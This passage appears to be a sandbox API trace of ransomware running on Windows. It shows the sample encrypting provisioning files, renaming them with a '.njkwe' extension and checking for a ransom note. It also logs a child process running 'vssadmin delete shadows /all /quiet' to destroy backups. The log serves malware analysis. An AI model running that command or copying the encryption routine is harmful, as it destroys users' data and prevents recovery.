lpNewFilePointer=0xffffffff) returned 1 [0082.225] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0082.225] GetProcessHeap () returned 0xbe0000 [0082.225] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.225] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.225] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.225] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.225] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.225] CloseHandle (hObject=0x444) returned 1 [0082.225] GetProcessHeap () returned 0xbe0000 [0082.225] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.225] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\578__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0082.225] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\578__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\578__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\578__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\578__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.226] GetProcessHeap () returned 0xbe0000 [0082.226] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.226] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x914e8d94, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x914e8d94, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x914e8d94, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="579__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", cAlternateFileName="579__C~1.PRO")) returned 1 [0082.226] lstrcmpiW (lpString1="579__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.226] lstrcmpiW (lpString1="579__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.226] lstrcmpiW (lpString1="579__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.226] lstrcmpiW (lpString1="579__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.226] lstrcmpiW (lpString1="579__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.226] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\579__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml") returned 156 [0082.226] StrStrIW (lpFirst="579__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.226] lstrcmpW (lpString1="579__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.226] lstrcmpW (lpString1="579__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.226] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\579__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.227] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\579__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\579__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.227] GetTickCount () returned 0x1154dce [0082.227] GetTickCount () returned 0x1154dce [0082.227] GetTickCount () returned 0x1154dce [0082.227] GetTickCount () returned 0x1154dce [0082.227] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.227] GetProcessHeap () returned 0xbe0000 [0082.227] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.227] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0082.228] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.228] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0082.229] GetProcessHeap () returned 0xbe0000 [0082.229] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.229] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.229] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.229] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.229] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.229] CloseHandle (hObject=0x444) returned 1 [0082.229] GetProcessHeap () returned 0xbe0000 [0082.229] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.229] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\579__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0082.229] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\579__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\579__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\579__Connections_Cellular_o2 (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\579__connections_cellular_o2 (germany)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.230] GetProcessHeap () returned 0xbe0000 [0082.230] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.230] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x902ba650, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x902ba650, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x902ba650, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x340, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="57__Connections_Cellular_TIM (Brazil)_i0$(__MVID)@WAP.provxml", cAlternateFileName="57__CO~1.PRO")) returned 1 [0082.230] lstrcmpiW (lpString1="57__Connections_Cellular_TIM (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.230] lstrcmpiW (lpString1="57__Connections_Cellular_TIM (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.230] lstrcmpiW (lpString1="57__Connections_Cellular_TIM (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.230] lstrcmpiW (lpString1="57__Connections_Cellular_TIM (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.230] lstrcmpiW (lpString1="57__Connections_Cellular_TIM (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.230] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\57__Connections_Cellular_TIM (Brazil)_i0$(__MVID)@WAP.provxml") returned 155 [0082.230] StrStrIW (lpFirst="57__Connections_Cellular_TIM (Brazil)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.230] lstrcmpW (lpString1="57__Connections_Cellular_TIM (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.230] lstrcmpW (lpString1="57__Connections_Cellular_TIM (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.230] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\57__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.230] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\57__Connections_Cellular_TIM (Brazil)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\57__connections_cellular_tim (brazil)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.231] GetTickCount () returned 0x1154dce [0082.231] GetTickCount () returned 0x1154dce [0082.231] GetTickCount () returned 0x1154dce [0082.231] GetTickCount () returned 0x1154dce [0082.231] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.231] GetProcessHeap () returned 0xbe0000 [0082.231] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.231] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x340, lpOverlapped=0x0) returned 1 [0082.232] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffcc0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.232] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x340, lpOverlapped=0x0) returned 1 [0082.232] GetProcessHeap () returned 0xbe0000 [0082.232] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.232] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.233] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.233] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.233] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.233] CloseHandle (hObject=0x444) returned 1 [0082.233] GetProcessHeap () returned 0xbe0000 [0082.233] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.233] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\57__Connections_Cellular_TIM (Brazil)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 175 [0082.233] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\57__Connections_Cellular_TIM (Brazil)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\57__connections_cellular_tim (brazil)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\57__Connections_Cellular_TIM (Brazil)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\57__connections_cellular_tim (brazil)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x49d1f000" os_pid = "0x5f0" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0xf54" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000fac7" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 9 os_tid = 0x1b4 Thread: id = 10 os_tid = 0xe9c Thread: id = 11 os_tid = 0x470 Thread: id = 12 os_tid = 0xa2c Thread: id = 13 os_tid = 0xa14 Thread: id = 14 os_tid = 0x8dc Thread: id = 15 os_tid = 0x8d4 Thread: id = 16 os_tid = 0x520 Thread: id = 17 os_tid = 0x67c Thread: id = 18 os_tid = 0x678 Thread: id = 19 os_tid = 0x644 Thread: id = 20 os_tid = 0x640 Thread: id = 21 os_tid = 0x63c Thread: id = 22 os_tid = 0x5f4 Process: id = "3" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x5e64000" os_pid = "0xb6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf54" cmd_line = "\"C:\\WINDOWS\\sysnative\\vssadmin.exe\" delete shadows /all /quiet" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 23 os_tid = 0xda8 Thread: id = 29 os_tid = 0x344 Thread: id = 31 os_tid = 0x9e4 Thread: id = 32 os_tid = 0xf64 Thread: id = 33 os_tid = 0xf38 Process: id = "4" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x12db6000" os_pid = "0xdac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xb6c" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 24 os_tid = 0xac8 Thread: id = 25 os_tid = 0x6d8 Thread: id = 26 os_tid = 0xc48 Thread: id = 27 os_tid = 0xf2c Thread: id = 28 os_tid = 0x910